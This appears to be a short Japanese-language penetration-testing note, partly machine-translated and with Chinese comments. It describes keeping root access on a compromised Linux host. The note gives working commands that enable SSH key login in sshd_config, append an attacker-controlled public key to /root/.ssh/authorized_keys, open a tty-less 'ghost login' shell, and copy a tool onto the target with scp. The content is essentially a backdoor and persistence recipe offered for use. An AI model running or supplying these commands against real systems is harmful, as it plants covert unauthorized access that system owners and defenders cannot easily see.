0x00前提
- 過去の古いもの、水物を取り出す
- 一般に、Rce、権限昇格などを通じて、ターゲット Linux の root 権限を取得します。
- 主な理由は、パスワードがなく、ハッシュを使い果たすことができず、マシンが正常にネットワークから出ることができないことです。
- 転送リンクを試すことができます
0x01 最初のターゲット ホスト、ターゲット Ssh サービス構成を変更する
SSH証明書ログインを有効にし、SSHサービスを再起動します。
echo RSAAuthentication yes >> /etc/ssh/sshd_config
echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
systemctl restart sshd
0x02 ローカル Linux でキーを生成
# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
注: このキーによりホスト名が公開されるため、この手順では純粋な Linux ビルドに進むことが最善です。
//找见id_rsa.pub自行拷贝出来
ls -al /root/.ssh/
cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop/
//赋于权限
chmod 777 /home/xxxx/Desktop/id_rsa.pub
/root/.ssh/フォルダーには 2 つのファイルがあります。
id_rsa(私钥)
id_rsa.pub(公钥)
0x03 Linux ターゲット マシンが公開キーを書き込みます
-
公開キーを自分でイントラネット Linux にアップロードし、/root/.ssh/ ディレクトリに保存し、ファイル名をauthorized_keys に変更するか、echo を使用してコマンドの実行を追加します。
-
authorized_keys ファイルがターゲットにすでに存在する場合は、それを最後に追加するだけです
-
注: 緊急の場合に備えて、再度操作する前に、元のauthorized_keysを「バックアップ」してください。
# echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= [email protected] >> /root/.ssh/authorized_keys
0x04 ゴーストログイン
ssh -T [email protected] /usr/bin/bash -i
0x05 Scp を使用してパスワードなしでファイルを転送する
scp -P 22 -r /root/fsacn [email protected]:/usr/tmp/fsacn